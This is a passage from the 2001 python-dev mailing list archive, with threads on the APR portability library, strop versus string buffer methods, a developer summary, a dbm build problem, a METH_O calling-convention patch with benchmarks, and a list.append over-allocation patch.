> Yes, it should be easy to write x-platform code, but if there's some very > specific platform trick I can do with, say, setsockopt, I don't want > Python to hide it from me just 'cause it doesn't work on VMS. APR isn't a least common denominator approach. >... > > That doc is out of date; the list is missing: shared library handling, i18n, > > mmap, user information access (e.g. getpwnam), uuid handling, getopt > > replacements, cryptographic random data, and a few other bits here and > > there. The shared mem actually is implemented mostly, via the libmm library. > > How big is APR? That's relative :-) On my Linux box, a stripped library is 85k. It is also (theoretically) possible to skip building portions of APR. The APIs and symbols are set up for that, but the autoconf setup isn't yet. If you're embedding a private APR build, then you can fine tune what is needed. However, if you're building a public/shared one, then you wouldn't really want to trim it back like that. > How stable? The existing functionality is quite stable. We just keep adding more, though :-) > (in terms of interface; I'm assuming it > doesn't crap out through bad programming or it'd be a non-starter) hehe... you can call it a non-starter, then. APR assumes you pass it valid pointers and objects. For example, if you call apr_file_read(NULL, NULL, 100), then you'll get a segfault rather than EINVAL. Personally, I find that behavior quite fine (EINVAL will invariably get ignored; a segfault doesn't; and this is a programmer error that needs to be attended to -- throw it in his face) Whether others think that is a non-starter... hard to know :-) [ actually, one of the hardest things to integrate would be APR's memory management approach with Python's ] > > And note that some of those topics have some nice depth. As I mentioned, > > network_io supports IPv6, but also portable name lookups, sendfile(), etc. 
> > The file_io stuff support optimized stat() and opendir-type calls for the > > platform. > > > > > It currently supports: Unix (includes BeOS), Win32 and OS/2. > > > > A lot more than that :-) Pretty much all the Unix variants, including > > OS/390 and BS2000 and MacOS X, and TPF, and some other oddballs. > > That's still less than Python isn't it? RiscOS, Amiga, PalmOS, VMS, > Playstation 2(!), from looking at > http://www.python.org/download/download_other.html. Sure it's smaller. It's a blue sky radical suggestion. No more, no less. :-) I mentioned it because the IPv6 stuff came up. I already know a codebase that has handled all the portability issues. That is a bonus :-) However, for the platforms that APR *does* handle today, that would still be a big code reduction for Python. And in the future? Why not extend APR to those other platforms and reduce the Python code even more. I think shifting Python to a portability library is actually quite an interesting thought experiment. Enough to mention it and get people thinking. I think it could be quite handy for the longer term maintainability. Cheers, -g -- Greg Stein, http://www.lyra.org/ From mal at lemburg.com Thu May 24 16:54:24 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Thu, 24 May 2001 16:54:24 +0200 Subject: [Python-Dev] strop vs. string References: <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com> <20010524060016.D5402@lyra.org> Message-ID: <3B0D20A0.3C881F89@lemburg.com> Greg Stein wrote: > > On Thu, May 24, 2001 at 12:18:50PM +0200, M.-A. Lemburg wrote: > > Greg Stein wrote: > >... > > > So... my question is: is there any way that we can retain a generic find() > > > (and similar functions from the string/strop module) that operates on any > > > type that implements the buffer API? > > > > > > Maybe there is some way we can do a mixin for Python types? e.g. 
"this mixin > > > implements some standard methods for 8-bit character data (using the buffer > > > API), which can be mixed into new Python types" That would reduce the burden > > > for new types. > > > > I suppose that in 2.2 we'll be able to build a class/type > > hierarchy which then provides these possibilities. I haven't > > followed Guido's latest checkins closely though -- could be that > > types don't support multiple inheritence. > > No idea either... that's why I asked. > > > BTW, wouldn't it suffice to add these methods to buffer objects ? > > Then you could write: buffer(ob).find('.'). > > You're totally missing the point with that suggestion. It does *not* suffice > to add them to buffer objects. What about array objects? mmap objects? > Random Joe Object who implements the buffer interface? That's the point: you can wrap all those into a buffer object and then use the buffer object methods to manipulate them. In that sense, buffer objects provide an adaptor to the underlying object which implements the needed methods. > All of those are out of luck. > > With strop, I can pass any of those objects to strop.find(). That function > has a polymorphic argument. > > In the current arrangement, every object must implement their own .find and > .upper and .whatever. > > Cheers, > -g > > -- > Greg Stein, http://www.lyra.org/ -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From skip at pobox.com Thu May 24 17:55:23 2001 From: skip at pobox.com (skip at pobox.com) Date: Thu, 24 May 2001 10:55:23 -0500 Subject: [Python-Dev] strop vs. 
string In-Reply-To: <20010524060016.D5402@lyra.org> References: <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com> <20010524060016.D5402@lyra.org> Message-ID: <15117.12011.323759.496982@beluga.mojam.com> Greg> With strop, I can pass any of those objects to strop.find(). That Greg> function has a polymorphic argument. Where doesn't strop compile/run? If it works everywhere, either just rename it to be the string module (copying any bits from the existing string module that it doesn't yet have) or rename it something like buffer_funcs. Skip From skip at pobox.com Thu May 24 17:58:24 2001 From: skip at pobox.com (skip at pobox.com) Date: Thu, 24 May 2001 10:58:24 -0500 Subject: [Python-Dev] APR (was: IPv6) In-Reply-To: References: <20010524055555.B5402@lyra.org> Message-ID: <15117.12192.114564.111578@beluga.mojam.com> >> > It currently supports: Unix (includes BeOS), Win32 and OS/2. >> >> A lot more than that :-) Pretty much all the Unix variants, including >> OS/390 and BS2000 and MacOS X, and TPF, and some other oddballs. Michael> That's still less than Python isn't it? RiscOS, Amiga, PalmOS, Michael> VMS, Playstation 2(!), Not to mention MacOS < X... ;-) Skip From mwh at python.net Thu May 24 18:38:37 2001 From: mwh at python.net (Michael Hudson) Date: Thu, 24 May 2001 17:38:37 +0100 (BST) Subject: [Python-Dev] python-dev summary 2001-05-10 - 2001-05-24 Message-ID: This is a summary of traffic on the python-dev mailing list between May 10 and May 24 (inclusive) 2001. It is intended to inform the wider Python community of ongoing developments. To comment, just post to python-list at python.org or comp.lang.python in the usual way. Give your posting a meaningful subject line, and if it's about a PEP, include the PEP number (e.g. Subject: PEP 201 - Lockstep iteration) All python-dev members are interested in seeing ideas discussed by the community, so don't hesitate to take a stance on a PEP if you have an opinion. 
This is the eighth summary written by Michael Hudson. Summaries are archived at:

Posting distribution (with apologies to mbm)

Number of articles in summary: 322

    Week         Thu  Fri  Sat  Sun  Mon  Tue  Wed
    May 10-16     23   25   17   18   28   31   36
    May 17-23     32   25    2   15   18   20   32

Pretty busy fortnight. The above distribution may be somewhat skewed because I changed my subscription address to python-dev and was unsubscribed for a while. Although any impact this had is probably countered by ESR and Barry's discussion of "Puffy the Frog"...

* Type/class *

Paul Prescod has been keeping an eye on Guido's descr-branch work, and posted concerns about when objects will have a __dict__: Then there was more technical discussion about subclassing builtin types and Steven Majewski evangelising prototype-based OO languages (though I'm not sure why!).

* Easy codec access *

Marc-Andre Lemburg checked in his decode string method patch, and some new codecs so you can now do things like:

    >>> "abc".encode('zlib').encode('base64')
    'eJxLTEoGAAJNASc=\n'
    >>> _.decode('base64').decode('zlib')
    'abc'

There was a small discussion on what other codecs might be handy and Guido added quoted-printable to check it was easy.
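In today's Python 3 the same chain still works, but bytes-to-bytes codecs such as zlib and base64 are reached through codecs.encode() and codecs.decode() rather than str.encode(). The sketch below assumes Python 3 and the standard "zlib", "base64" and "quopri" codec aliases; pack() and unpack() are hypothetical helper names, not part of any API.

```python
import codecs


def pack(data: bytes) -> bytes:
    # Compress, then base64 the result so it is ASCII-safe, mirroring
    # "abc".encode('zlib').encode('base64') from the session above.
    return codecs.encode(codecs.encode(data, "zlib"), "base64")


def unpack(text: bytes) -> bytes:
    # Undo the two steps in reverse order.
    return codecs.decode(codecs.decode(text, "base64"), "zlib")


packed = pack(b"abc")
print(packed)           # base64 text ending in a newline, like the session above
print(unpack(packed))   # b'abc'

# The quoted-printable codec is reachable the same way.
qp = codecs.encode(b"caf\xe9 = 1", "quopri")
print(codecs.decode(qp, "quopri"))  # b'caf\xe9 = 1'
```

unpack() also accepts the exact string printed in the 2001 session, since a zlib stream carries its own checksum and decompresses the same way regardless of which zlib version produced it.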
* Performance *

The big discussion(s) on python-dev over the past fourteen days has centred on performance, especially that of comparisons and the related area of dict performance. It all started with Tim Peters running a simple test program on 2.0, 2.1 and current CVS:

The discussion had an unusual flavour for one about performance: a concentration on measuring performance numbers and making sure that the optimizations being discussed actually improved these numbers. This is hard; everyone wants to speed up the "typical Python app", but of course there is no such thing. People have been using, amongst others, pystone, pybench and the test suite, none of which are particularly good candidates...

Tim posted the distribution of sizes of dicts in a run of the test suite: which showed that small dicts are overwhelmingly the commonest. Marc piped up with an old optimization idea of his: He posted a patch to SourceForge, Tim rewrote it and checked it in, so dicts should be a little faster in 2.2.

But as I said, the discussion was kicked off by the performance of comparisons, especially of strings. Martin von Loewis posted some statistics from an instrumented interpreter:

The issue is that the rich comparisons of Python 2.1 have added a layer of complexity to the comparison code. Although the rich comparisons (might) provide an opportunity for faster code in some circumstances, code that still uses old-style comparisons can and does take a hit. Strings still use the old-style comparisons and are compared a *lot* (especially in dicts), so it seems "upgrading" them to rich comparisons should be a win, and Marc posted a patch to sf that does this. Marc also managed to promise to make a concerted effort to find speed optimizations in the next few months:

Finally, in a coda, Jeremy noticed that Python spends an alarming amount of time decoding those "Oi|s#" strings that get passed to PyArg_ParseTuple: and Tim pointed out that optimizing "O" might be a win:

* FP vs. tutorial *

Tim pointed out that the tutorial currently contains examples of floating point output that are platform dependent, and that this is bad. He proposed changing the tutorial to only use fractions that can be exactly represented as floats, and adding a discussion (possibly in an appendix) of the reasons why

    >>> 0.1
    0.10000000000000001

is not broken. There was some debate about how detailed that discussion should be, where the point was made that it's not really important to explain precisely *why* this happens; it suffices to convince the newbie that floating point is more complicated than he or she thinks. Let's hope that suitable text is composed soon, and that people actually read it... there have been two "floating point is broken" bug reports on SourceForge in just the last week.

* unifying os.rename semantics across platforms *

Skip pointed out that os.rename behaves differently on Posix and Windows platforms when the destination file exists: on Posix the destination is silently replaced in an atomic operation, whereas on Windows an exception is raised. Skip proposed enforcing Posix semantics everywhere, but this has two problems: (a) it's backwards incompatible, and (b) it's impossible (you can't avoid the race condition on Windows). So maybe we'll just settle for better documentation.

* Python 2.1.1 *

Thomas Wouters started back-porting bug fixes to the 2.1-maint branch in preparation for a 2.1.1 release. There are as yet no firm (or even vague) plans about release dates.

* Daily Python-URL on your Palm *

Marc-Andre Lemburg announced that you can now read Pythonware's Daily Python-URL on your Palm Pilot as an AvantGo channel:

Cheers, M.

From gstein at lyra.org Thu May 24 21:45:18 2001 From: gstein at lyra.org (Greg Stein) Date: Thu, 24 May 2001 12:45:18 -0700 Subject: [Python-Dev] strop vs.
string In-Reply-To: <3B0D20A0.3C881F89@lemburg.com>; from mal@lemburg.com on Thu, May 24, 2001 at 04:54:24PM +0200 References: <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com> <20010524060016.D5402@lyra.org> <3B0D20A0.3C881F89@lemburg.com> Message-ID: <20010524124518.N5402@lyra.org> On Thu, May 24, 2001 at 04:54:24PM +0200, M.-A. Lemburg wrote: >... > That's the point: you can wrap all those into a buffer object > and then use the buffer object methods to manipulate them. In > that sense, buffer objects provide an adaptor to the underlying > object which implements the needed methods. That would certainly be a valid solution. And at the C level, we could share functions between PyBufferObject and PyStringObject. Cheers, -g -- Greg Stein, http://www.lyra.org/ From gstein at lyra.org Thu May 24 22:07:43 2001 From: gstein at lyra.org (Greg Stein) Date: Thu, 24 May 2001 13:07:43 -0700 Subject: [Python-Dev] APR (was: IPv6) In-Reply-To: <15117.12192.114564.111578@beluga.mojam.com>; from skip@pobox.com on Thu, May 24, 2001 at 10:58:24AM -0500 References: <20010524055555.B5402@lyra.org> <15117.12192.114564.111578@beluga.mojam.com> Message-ID: <20010524130743.O5402@lyra.org> On Thu, May 24, 2001 at 10:58:24AM -0500, skip at pobox.com wrote: > > >> > It currently supports: Unix (includes BeOS), Win32 and OS/2. > >> > >> A lot more than that :-) Pretty much all the Unix variants, including > >> OS/390 and BS2000 and MacOS X, and TPF, and some other oddballs. > > Michael> That's still less than Python isn't it? RiscOS, Amiga, PalmOS, > Michael> VMS, Playstation 2(!), > > Not to mention MacOS < X... ;-) As I mentioned, MacOS X is already there. MacOS Classic is not. But the presence of a portability library such as APR does not exclude the use of direct platform hooks where/when necessary. For a bunch of stuff, you use APR [to reduce complexity/maintenance]. For the rest, you go native just like today. 
Cheers, -g -- Greg Stein, http://www.lyra.org/ From skip at pobox.com Thu May 24 23:15:48 2001 From: skip at pobox.com (skip at pobox.com) Date: Thu, 24 May 2001 16:15:48 -0500 Subject: [Python-Dev] Odd message from test_dbm Message-ID: <15117.31236.804746.160037@beluga.mojam.com> I just noticed this message when running make test: test test_dbm skipped -- /home/skip/src/python/dist/src/build/build/lib.linux-i686-2.1/dbm.so: undefined symbol: dbm_firstkey I'm running a vanilla Mandrake 8.0 system. Unfortunately, I can't check libc.so or /usr/lib/libgdbm.so because the Mandrake folks saw fit to strip them... Anybody else seen this? Skip From thomas at xs4all.net Thu May 24 23:42:58 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Thu, 24 May 2001 23:42:58 +0200 Subject: [Python-Dev] Odd message from test_dbm In-Reply-To: <15117.31236.804746.160037@beluga.mojam.com>; from skip@pobox.com on Thu, May 24, 2001 at 04:15:48PM -0500 References: <15117.31236.804746.160037@beluga.mojam.com> Message-ID: <20010524234258.I690@xs4all.nl> On Thu, May 24, 2001 at 04:15:48PM -0500, skip at pobox.com wrote: > I just noticed this message when running make test: > test test_dbm skipped -- /home/skip/src/python/dist/src/build/build/lib.linux-i686-2.1/dbm.so: undefined symbol: dbm_firstkey > I'm running a vanilla Mandrake 8.0 system. Unfortunately, I can't check > libc.so or /usr/lib/libgdbm.so because the Mandrake folks saw fit to strip > them... The problem is that the dbmmodule isn't linked to the right library. Debian has a similar (if not the same) problem. setup.py doesn't try hard enough to figure out the right library to link with; it checks for libndbm, but not libdbm or libgdbm (it assumes DBM support is in libc if not in libndbm.) I *think* all it needs to do is check for libdbm as well as libndbm, but this might pick up old/incompatible libraries on some platforms, and it might still require fiddling of include paths on others. 
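Thomas's suggestion amounts to probing several library names in turn and falling back to libc. A minimal sketch of that search order, using the stdlib helper `ctypes.util.find_library` as the probe (this is a swapped-in choice: setup.py at the time used its own distutils-based checks). The candidate list and `pick_dbm_library` are hypothetical, and the sketch deliberately ignores the header-path question Thomas raises next:

```python
import ctypes.util

# Hypothetical candidate order, following the names Thomas mentions:
# libndbm first, then libdbm, then libgdbm.
DBM_CANDIDATES = ("ndbm", "dbm", "gdbm")


def pick_dbm_library(candidates=DBM_CANDIDATES, finder=ctypes.util.find_library):
    """Return the first candidate library name the finder locates, or None.

    None stands for "assume the dbm_* functions live in libc", the fallback
    Thomas describes. The finder is a parameter so the order can be tested
    without depending on what is installed.
    """
    for name in candidates:
        if finder(name):
            return name
    return None


if __name__ == "__main__":
    print(pick_dbm_library())
```

Checking more names widens the net but, as Thomas warns, may also pick up an old or incompatible library on some platforms.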
I seem to recall you had to include either /usr/include/db1/ndbm.h (to use libdbm) or /usr/include/gdbm/ndbm.h or /usr/include/gdbm-ndbm.h (to use gdbm's ndbm 'emulation') but I gave up in frustration trying to figure out the difference :P -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From greg at cosc.canterbury.ac.nz Fri May 25 04:45:01 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Fri, 25 May 2001 14:45:01 +1200 (NZST) Subject: [Python-Dev] strop vs. string In-Reply-To: <3B0CE00A.488C8D73@lemburg.com> Message-ID: <200105250245.OAA00640@s454.cosc.canterbury.ac.nz> "M.-A. Lemburg" : > BTW, wouldn't it suffice to add these methods to buffer objects ? > Then you could write: buffer(ob).find('.'). Aren't buffer objects as they're currently implemented inherently dangerous?

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,          | A citizen of NewZealandCorp, a       |
Christchurch, New Zealand          | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz      +--------------------------------------+

From martin at loewis.home.cs.tu-berlin.de Fri May 25 08:00:47 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Fri, 25 May 2001 08:00:47 +0200 Subject: [Python-Dev] Special-casing "O" Message-ID: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de>

> Special-casing the snot out of "O" looks like a winner:

I have a patch on SF that takes this approach: http://sourceforge.net/tracker/index.php?func=detail&aid=427190&group_id=5470&atid=305470 The idea is that functions can be declared as METH_O, instead of METH_VARARGS. I also offer METH_l, but this is currently not used. The approach could be extended to other signatures, e.g. METH_O_opt_O (i.e. "O|O"). Some signatures cannot be changed into special-calls, e.g. "O!", or "ll|l".
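Martin's point is that a METH_O function receives its single argument directly, instead of an argument tuple it must run through PyArg_ParseTuple. The Python toy model below is only an analogy for that control flow: the flag names echo CPython's METH_VARARGS and METH_O, but their values, `call_method`, `parse_single_object` and the two `append_*` helpers are made up for illustration and are not CPython's dispatch code.

```python
# Toy model: names mirror CPython's METH_VARARGS / METH_O flags, but the
# values and the dispatcher below are illustrative labels only.
METH_VARARGS = "varargs"
METH_O = "o"


def parse_single_object(args):
    """Stand-in for PyArg_ParseTuple(args, "O", &obj): check arity, unpack."""
    if len(args) != 1:
        raise TypeError("function takes exactly 1 argument (%d given)" % len(args))
    return args[0]


def call_method(func, flags, self, *args):
    if flags == METH_VARARGS:
        # The callee receives the whole tuple and must parse it itself.
        return func(self, args)
    if flags == METH_O:
        # The dispatcher checks the arity once and passes the object through;
        # no format string is interpreted on each call.
        if len(args) != 1:
            raise TypeError("expected exactly one argument")
        return func(self, args[0])
    raise ValueError("unsupported calling convention")


def append_varargs(self, args):
    self.append(parse_single_object(args))


def append_o(self, obj):
    # Converting to METH_O is "basically just remove the parse call".
    self.append(obj)


items = []
call_method(append_varargs, METH_VARARGS, items, 1)
call_method(append_o, METH_O, items, 2)
print(items)  # [1, 2]
```

Both paths produce the same result; the difference Martin measured comes from skipping the per-call format-string parsing, which this model only gestures at.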
In the PyXML test suite, "O" is indeed the most frequent case (72%), and it is primarily triggered through len (26%), append (24%), and ord (6%). These are the only functions that make use of the new calling conventions at the moment. If you look at the patch, you'll see that it is quite easy to change a method to use a different calling convention (basically just remove the PyArg_ParseTuple call). To measure the patch, I use the script

    from time import clock
    indices = [1] * 20000
    indices1 = indices*100
    r1 = [1]*60

    def doit(case):
        s = clock()
        i = 0
        if case == 0:
            f = ord
            for i in indices1:
                f("o")
        elif case == 1:
            for i in indices:
                l = []
                f = l.append
                for i in r1:
                    f(i)
        elif case == 2:
            f = len
            for i in indices1:
                f("o")
        f = clock()
        return f - s

    for i in xrange(10):
        print "%.3f %.3f %.3f" % (doit(0),doit(1),doit(2))

Without the patch, (almost) stock CVS gives

    2.190 1.800 2.240
    2.200 1.800 2.220
    2.200 1.800 2.230
    2.220 1.800 2.220
    2.200 1.800 2.220
    2.200 1.790 2.240
    2.200 1.790 2.230
    2.200 1.800 2.220
    2.200 1.800 2.240
    2.200 1.790 2.230

With the patch, I get

    1.440 1.330 1.460
    1.420 1.350 1.440
    1.430 1.340 1.430
    1.510 1.350 1.460
    1.440 1.360 1.470
    1.460 1.330 1.450
    1.430 1.330 1.420
    1.440 1.340 1.440
    1.430 1.340 1.430
    1.410 1.340 1.450

So the speed-up is roughly 30% to 50%, depending on how much work the function has to do. Please let me know what you think. Regards, Martin

From mal at lemburg.com Fri May 25 10:23:10 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Fri, 25 May 2001 10:23:10 +0200 Subject: [Python-Dev] strop vs. string References: <200105250245.OAA00640@s454.cosc.canterbury.ac.nz> Message-ID: <3B0E166E.581816AA@lemburg.com> Greg Ewing wrote: > > "M.-A. Lemburg" : > > > BTW, wouldn't it suffice to add these methods to buffer objects ? > > Then you could write: buffer(ob).find('.'). > > Aren't buffer objects as they're currently implemented > inherently dangerous? Why should they be ?
-- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal at lemburg.com Fri May 25 10:56:12 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Fri, 25 May 2001 10:56:12 +0200 Subject: [Python-Dev] Special-casing "O" References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> Message-ID: <3B0E1E2C.4BC121B5@lemburg.com> "Martin v. Loewis" wrote: > > > Special-casing the snot out of "O" looks like a winner: > > I have a patch on SF that takes this approach: > > http://sourceforge.net/tracker/index.php?func=detail&aid=427190&group_id=5470&atid=305470 > > The idea is that functions can be declared as METH_O, instead of > METH_VARARGS. I also offer METH_l, but this is currently not used. The > approach could be extended to other signatures, e.g. METH_O_opt_O > (i.e. "O|O"). Some signatures cannot be changed into special-calls, > e.g. "O!", or "ll|l". > > [benchmark] > So the speed-up is roughly 30% to 50%, depending on how much work the > function has to do. > > Please let me know what you think.

Great idea, Martin. One suggestion though: what I would change is the way the function is "declared" in the method list. You currently use:

    {"append", (PyCFunction)listappend, METH_O, append_doc},

Now this would be more flexible if you would implement a scheme which lets us put the parser string into the method list. The call mechanism could then easily figure out how to call the method and it would also be more easily extensible:

    {"append", (PyCFunction)listappend, METH_DIRECT, append_doc, "O"},

This would then (just like in your patch) call the listappend function with the parser arguments inlined into the C call:

    listappend(self, arg0)

A parser marker "OO" would then call a method like this:

    method(self, arg0, arg1)

and so on.
This approach costs a little more (the string compare), but should provide a more direct way of converting existing functions to the new convention (just copy&paste the PyArg_ParseTuple() argument) and also allows implementing a generic scheme which then again relies on PyArg_ParseTuple() to do the argument parsing, e.g. "is#" could be implemented as:

    PyObject *method(PyObject *self, int arg0, char *arg1, int *arg1_len)

For optional arguments we'd need some convention which then lets the called function add the default value as needed.

-- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From ping at lfw.org Fri May 25 12:56:33 2001 From: ping at lfw.org (Ka-Ping Yee) Date: Fri, 25 May 2001 05:56:33 -0500 (CDT) Subject: [Python-Dev] May 25 is Towel Day (towelday.org) Message-ID: If you have enjoyed Douglas Adams' works, please consider carrying or wearing a towel with you everywhere today, May 25, as a tribute and in his memory. For more about Towel Day, visit http://www.towelday.org/. My apologies for being off-topic. -- ?!ng From gstein at lyra.org Fri May 25 13:59:23 2001 From: gstein at lyra.org (Greg Stein) Date: Fri, 25 May 2001 04:59:23 -0700 Subject: [Python-Dev] strop vs. string In-Reply-To: <3B0E166E.581816AA@lemburg.com>; from mal@lemburg.com on Fri, May 25, 2001 at 10:23:10AM +0200 References: <200105250245.OAA00640@s454.cosc.canterbury.ac.nz> <3B0E166E.581816AA@lemburg.com> Message-ID: <20010525045923.C12056@lyra.org> On Fri, May 25, 2001 at 10:23:10AM +0200, M.-A. Lemburg wrote: > Greg Ewing wrote: > > "M.-A. Lemburg" : > > > > > BTW, wouldn't it suffice to add these methods to buffer objects ? > > > Then you could write: buffer(ob).find('.'). > > > > Aren't buffer objects as they're currently implemented > > inherently dangerous? > > Why should they be ?
The buffer object caches the pointer from getreadbuffer and friends. If the target object changes that pointer (internally), then the buffer object's value is stale. But that is a bug fix; it is independent of the discussion at hand. Cheers, -g -- Greg Stein, http://www.lyra.org/ From Barrett at stsci.edu Fri May 25 15:21:20 2001 From: Barrett at stsci.edu (Paul Barrett) Date: Fri, 25 May 2001 09:21:20 -0400 Subject: [Python-Dev] strop vs. string References: <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com> <20010524060016.D5402@lyra.org> <3B0D20A0.3C881F89@lemburg.com> Message-ID: <3B0E5C50.6E365F69@STScI.Edu> "M.-A. Lemburg" wrote: > > > > BTW, wouldn't it suffice to add these methods to buffer objects ? > > > Then you could write: buffer(ob).find('.'). > > > > You're totally missing the point with that suggestion. It does *not* > > suffice to add them to buffer objects. What about array objects? mmap > > objects? Random Joe Object who implements the buffer interface? > > That's the point: you can wrap all those into a buffer object > and then use the buffer object methods to manipulate them. In > that sense, buffer objects provide an adaptor to the underlying > object which implements the needed methods. Sounds like you are trying to make the buffer object into something it is not. Not that I have the foggiest idea what it is now, since it hasn't much use and is badly broken. I like your idea of sharing functions, I just don't think the buffer object is the proper means. I think the buffer object should be removed from Python and something better put in its place. (I'm not talking about the buffer C/API, though this could also use an overhaul, since it doesn't provide enough information to the receiving method.) What I think we need is: 1) a malloc object which has a similar interface to the mmap object with access protection, etc. This object would be the fundamental way of getting memory. 
The string object would use it to allocate a chunk of 'read-only' memory. Other objects would then know not to modify the contents of the memory. If you wanted a reference or view of the memory/buffer, you would get a reference to this object. 2) objects supporting the buffer object should provide a view method which returns a copy of themselves (and hence all their methods) and can be used to get a pointer to a subset of its memory. In this way the type of memory/buffer being accessed is known compared to the current buffer object which only indicates the buffer is binary or char data. In essence information about how the buffer should be used is lost in the current buffer C/API. -- Paul Barrett, PhD Space Telescope Science Institute Phone: 410-338-4475 ESS/Science Software Group FAX: 410-338-4767 Baltimore, MD 21218 From guido at digicool.com Fri May 25 16:29:28 2001 From: guido at digicool.com (Guido van Rossum) Date: Fri, 25 May 2001 10:29:28 -0400 Subject: [Python-Dev] Vacation Message-ID: <200105251429.f4PETSd10633@odiug.digicool.com> I will be on vacation next week without net access. Back on June 4th! There's a bunch of stuff that happened on the mailing list that I expect I won't get to -- I've got to finish up some high priority work for Digital Creations before I can leave. --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one at home.com Fri May 25 21:06:16 2001 From: tim.one at home.com (Tim Peters) Date: Fri, 25 May 2001 15:06:16 -0400 Subject: [Python-Dev] Time for the yearly list.append() panic Message-ID: c.l.py has rediscovered the quadratic-time worst-case behavior of list.append(). That is, do list.append(x) in a long loop. Linux users don't see anything particularly bad no matter how big the loop. WinNT eventually displays clear quadratic-time behavior. 
Win9x dies surprisingly early with a MemoryError, despite gobs of memory free: turns out Win9x allocates hundreds of virtual heaps, isn't able to coalesce them, and you actually run out of *address space* (the whole 2GB user space gets fragmented beyond hope). People on other platforms have reported other bad behaviors over the years. I don't want to argue about this again, I just want to know whether the patch below slows anything down on your oddball box. It increases the over-allocation amount in several more layers. Also replaces integer * and / in the over-allocation computation by bit operations (integer / in particular is very slow on *some* boxes). Long-term we should teach PyMalloc about Python's realloc() abuses and craft a cooperative solution.

Index: Objects/listobject.c
===================================================================
RCS file: /cvsroot/python/python/dist/src/Objects/listobject.c,v
retrieving revision 2.92
diff -c -r2.92 listobject.c
*** Objects/listobject.c	2001/02/12 22:06:02	2.92
--- Objects/listobject.c	2001/05/25 19:04:07
***************
*** 9,24 ****
  #include /* For size_t */
  #endif

! #define ROUNDUP(n, PyTryBlock) \
!         ((((n)+(PyTryBlock)-1)/(PyTryBlock))*(PyTryBlock))

  static int
  roundupsize(int n)
  {
!         if (n < 500)
                  return ROUNDUP(n, 10);
          else
!                 return ROUNDUP(n, 100);
  }

  #define NRESIZE(var, type, nitems) PyMem_RESIZE(var, type, roundupsize(nitems))
--- 9,30 ----
  #include /* For size_t */
  #endif

! #define ROUNDUP(n, nbits) \
!         ( ((n) + (1<<(nbits)) - 1) >> (nbits) << (nbits) )

  static int
  roundupsize(int n)
  {
!         if ((n >> 9) == 0)
!                 return ROUNDUP(n, 3);
!         else if ((n >> 13) == 0)
!                 return ROUNDUP(n, 7);
!         else if ((n >> 17) == 0)
                  return ROUNDUP(n, 10);
+         else if ((n >> 20) == 0)
+                 return ROUNDUP(n, 13);
          else
!                 return ROUNDUP(n, 18);
  }

  #define NRESIZE(var, type, nitems) PyMem_RESIZE(var, type, roundupsize(nitems))

From martin at loewis.home.cs.tu-berlin.de Fri May 25 21:51:26 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Fri, 25 May 2001 21:51:26 +0200 Subject: [Python-Dev] Special-casing "O" In-Reply-To: <3B0E1E2C.4BC121B5@lemburg.com> (mal@lemburg.com) References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> Message-ID: <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de> > Now this would be more flexible if you would implement a scheme > which lets us put the parser string into the method list. The > call mechanism could then easily figure out how to call the > method and it would also be more easily extensible: > > {"append", (PyCFunction)listappend, METH_DIRECT, append_doc, "O"}, I'd like to hear other people's comment on this specific issue, so I guess I should probably write a PEP outlining the options. My immediate reaction to your proposal is that it only complicates the interface without any savings. We still can only support a limited number of calling conventions. E.g. it is not possible to write portable C code that does all the calling conventions for "l", "ll", "lll", "llll", and so on - you have to cast the function pointer to the right prototype, which must be done in source code. So with this interface, you may end up at run-time finding out that you cannot support the signature. With the current patch, you'd have to know to convert "OO" into METH_OO, which I think is not asked too much - and it gives you a compile-time error if you use an unsupported calling convention. > A parser marker "OO" would then call a method like this: > > method(self, arg0, arg1) > > and so on. That is indeed the plan, but since you have to code the parameter combinations in C code, you can only support so many of them.
> allows implementing a generic scheme which > then again relies on PyArg_ParseTuple() to do the argument > parsing, e.g. "is#" could be implemented as: The point of the patch is to get rid of PyArg_ParseTuple in the "common case". For functions with complex calling conventions, getting rid of the PyArg_ParseTuple string parsing is not that important, since they are expensive, anyway (not that "is#" couldn't be supported, I'd call it METH_is_hash). > For optional arguments we'd need some convention which then > lets the called function add the default value as needed. For the moment, I'd only support "|O", and perhaps "|z"; an omitted argument would be represented as a NULL pointer. That means that "|i" couldn't participate in the fast calling convention - unless we translate that to void foo(PyObject*self, int i, bool ipresent); BTW, the most frequent function in my measurements that would make use of this convention is "OO|i:replace", which scores at 4.5%. Regards, Martin From gstein at lyra.org Fri May 25 22:27:52 2001 From: gstein at lyra.org (Greg Stein) Date: Fri, 25 May 2001 13:27:52 -0700 Subject: [Python-Dev] strop vs. string In-Reply-To: <3B0E5C50.6E365F69@STScI.Edu>; from Barrett@stsci.edu on Fri, May 25, 2001 at 09:21:20AM -0400 References: <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com> <20010524060016.D5402@lyra.org> <3B0D20A0.3C881F89@lemburg.com> <3B0E5C50.6E365F69@STScI.Edu> Message-ID: <20010525132752.B5402@lyra.org> On Fri, May 